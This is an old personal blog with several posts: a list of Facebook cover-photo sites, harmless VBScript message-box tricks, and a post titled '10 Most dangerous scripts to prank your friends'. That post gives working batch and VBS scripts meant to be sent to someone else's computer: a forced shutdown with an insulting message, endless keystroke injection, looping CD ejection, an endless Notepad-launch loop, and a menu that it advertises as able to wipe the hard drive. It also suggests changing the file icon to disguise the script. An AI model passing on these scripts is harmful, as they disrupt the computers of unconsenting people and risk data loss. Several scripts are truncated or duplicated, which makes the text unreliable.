Friday, February 7, 2014
Tuesday, February 4, 2014
Monday, January 20, 2014
Wednesday, December 18, 2013
Top 10 websites Where you can Find Stylish covers for facebook
Top 10 websites Where you can Find Stylish covers for facebook
Salam From Mohammed Faizan

As you know now a days every person try to do some new fun. And specially on
facebook with their friends.And cover photo is one of them people try to
change them and show some new to his freinds.Every body want to have a
unique and individual style image for his cover on his profile so for that i
am going to show you some best websites where you can get latest and your
own favourite and unique image you that you can place as your cover photo on
facebook,using These online tools you don't worry about the photo hieght
and width. You can apply these online as your timeline cover photo.You can
also download it.
click here for more
So Let have a look to these websites and his advantages.1. Smashingcovers.com
This is one of the best i like it. their are a lot of images with a lot of
categories available, So you can easily choose your favourite category and
then select your photo that's looking good to your eyes.
2.MyFbcover.com It contain a lot of categories for covers like games,
automobiles, music, nature etc. So you can find an unique image for your
cover photo without any hisitation.
3.Firstcovers.com: This is one of the best for you, Just visit and see.You
can choose a category and then choose your image you want.
4. Mycoverpoint.com: it conains a lot of images with defferent categories
like games.animals. celibrities. and many many more just try it now.
5.Coverjunction. This website contains images for your facebook timline
cover photos with a lot of different topics like technology. nature,
cartoons. actors etc.
6.Facebookcoverpix. In this site the most popular and amazing style of
images for your fb timline cover photo are available. you can view here and
you can download it.
7.jellycovers.com: This is another website where you can find new and latest
stylish cover photos for your facebook.So if you failed to find a good one
cover above then visit this site.
8.FbCoverStreet.com: Another Good one is fbcover street where you can find
urban lifestyle covers for your timeline cover so try this also.
9.FbCoverSkin.com: This is another good one that i want to share with you so
try this too. Choos a category and make it your own timeline cover.
10.BestFbcover.com: So at last i also check this site and search for a your
stylish cover photo.
I hope these will usefull for you.
If you like the post then please try to share this post with your friends.
Thursday, December 12, 2013
SIM Information System
Check How Many SIM’s Issued Against Your CNIC
salam from mohammed faizan
welcome visiter,today i have a new post for you,
click here for more click here for more
CNIC Number: | |
Example: | 6110123456789 |
Saturday, December 7, 2013
.VBS - Notepad Fun Tricks
.VBS - Notepad Fun Tricks
salam from mohammed faizan
Step 1 : Copy and paste the following into Notepad...
Step2: SAVE IT AS filename.VBS AND ENJOY!
HAVE A GOOD DAY.VBS
name=inputbox("Whats your name?")
msgbox("Have a good day, ") + name
pass=inputbox("Password?")
if pass="fish" then msgbox("Correct Password!") else msgbox("Incorrect Password!")
msgbox("Hello!")
msgbox("Hello, Again!")
DO
msgbox("VIRUS!")
LOOP
msgbox("HackTool VBS - Message box maker")
msg=inputbox("Enter a message...")
msgbox(" ") + msg
msgbox("HackTool VBS - Annoying Message box maker
msg=inputbox("Enter a message...")
DO
msgbox(" ") + msg
Loop
msgbox("HackTool VBS - Calculator - *")
num1=inputbox("Number 1...")
num2=inputbox("Number 2...")
msgbox num1*num2
msgbox("HackTool VBS - Question Box")
msg=inputbox("Enter a question...")
msgb=inputbox("Enter a message box message... ( message will be before answer) ")
answer=inputbox(" ") + msg
msgbox (" ") + msg + (" ") + answer
Set shell=CreateObject("wscript.shell")
Shell.Run("Notepad.exe")
Set shell=CreateObject("wscript.shell")
pass=inputbox("Enter a Password")
if pass="1234" then Shell.Run("Notepad.exe") else msgbox("Incorrect Password!")
Set shell=CreateObject("wscript.shell")
Shell.Run("Notepad.exe")
Set shell=CreateObject("wscript.shell")
Shell.Run("MSPaint")
Set shell=CreateObject("wscript.shell")
Shell.Run("CMD.exe")
Step2: SAVE IT AS filename.VBS AND ENJOY!
HAVE A GOOD DAY.VBS
msgbox("Have a good day, ") + name
SAVE IT AS HAVE A GOOD DAY.VBS AND ENJOY!
PASSWWORD PROTECT A .VBS SCRIPT
if pass="fish" then msgbox("Correct Password!") else msgbox("Incorrect Password!")
The password for this is fish
Save it as Password.vbs And enjoy!
MAKE A MESSAGE BOX (NOTEPAD MODE)
msgbox("Hello, Again!")
To make the " hold shift and 2
Inside the (" ") Type what you want it to say
MAKE A MESSAGE BOX LOOP
msgbox("VIRUS!")
LOOP
HACKTOOL VBS - MESSAGE BOX MAKER
msg=inputbox("Enter a message...")
msgbox(" ") + msg
HACKTOOL VBS - ANNOYING MESSAGE BOX MAKER
msg=inputbox("Enter a message...")
DO
msgbox(" ") + msg
Loop
HACKTOOL VBS - CALCULATOR_*
num1=inputbox("Number 1...")
num2=inputbox("Number 2...")
msgbox num1*num2
Save it as Cal.vbs
HACKTOOL VBS - QUESTION MAKER
msg=inputbox("Enter a question...")
msgb=inputbox("Enter a message box message... ( message will be before answer) ")
answer=inputbox(" ") + msg
msgbox (" ") + msg + (" ") + answer
Save it as Question.vbs
OPEN A PROGRAM
Shell.Run("Notepad.exe")
Save it as run.vbs and enjoy!
NOTE:
Paint is known as "MSPAINT"!
This one opens notepad.
OPEN A PROGRAM IF PASSWORD IS CORRECT
pass=inputbox("Enter a Password")
if pass="1234" then Shell.Run("Notepad.exe") else msgbox("Incorrect Password!")
The text in blue is what you want the password to be.
The text in red is what program you want to open.
Save it as runpass.vbs and enjoy!
OPEN A LOT OF PROGRAMS AT ONCE
Shell.Run("Notepad.exe")
Set shell=CreateObject("wscript.shell")
Shell.Run("MSPaint")
Set shell=CreateObject("wscript.shell")
Shell.Run("CMD.exe")
THIS WILL OPEN Notepad, Paint and CMD.
Save it as Opener.vbs and enjoy.
10 Most dangerous scripts to prank your friends
10 Most dangerous scripts to prank your friends
salam from Mohammed faizan
![]() |
=======================================
ALL OF THEZE COMMANDZ ARE TO BE TYPED IN NOTEPAD...
=======================================
1) Convey your friend a little message and shut down his / her computer:
Type :
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
Save it as "Anything.BAT" in All Files and send it.
=========================================
2) Toggle your friend's Caps Lock button simultaneously:
Type :
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it.
clcik here for more
=========================================
3) Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as "Anything.VBS" and send it.
===========================================
4) Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save it as "Anything.VBS" and send it.
================================================== =
5) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "
Save it as "Anything.VBS" and send it.
================================================== =========
6) Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Save it as "Anything.VBS" and send it.
================================================== =======
7) Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop
Save it as "Anything.VBS" and send it.
================================================== ==
8. Open Notepad continually in your friend's computer:
Type :
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as "Anything.BAT" and send it.
================================================== ====
9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:
1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :
@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
Save it as "Anything.BAT" and send it.
================================================== ======
You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.
To Stop this ->
Go To Task Manager and End wscript.exe process.
Subscribe to:
Posts (Atom)